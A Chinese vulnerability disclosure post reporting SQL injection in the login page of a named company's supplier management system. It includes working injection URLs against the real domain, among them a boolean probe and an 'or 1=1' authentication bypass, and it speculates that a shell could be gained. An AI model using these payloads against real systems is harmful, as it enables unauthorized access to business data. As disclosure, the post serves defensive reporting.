万达供应商系统SQL注射漏洞
简要描述:万达某分站sql注入。敏感信息泄露。详细说明:
万达scm系统登陆框sql注入。
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
500错误。
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png
截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)
经过分析,登陆验证的过程应该是:
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png
oracle数据库,存在注入点。@大连万达,你怎么看?
http://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png
系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。
漏洞证明:
万达scm系统登陆框sql注入。
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
500错误。
用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
http://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png
(截图有一点问题)
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
绕过:
http://www.vans-china.cn/LoginUser?USERNO=1%27%20or%20%271%27=%271&PWD=1
oracle数据库,存在注入点。@大连万达,你怎么看?
系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。
修复方案:
。。。
厂商已经确认
页:
[1]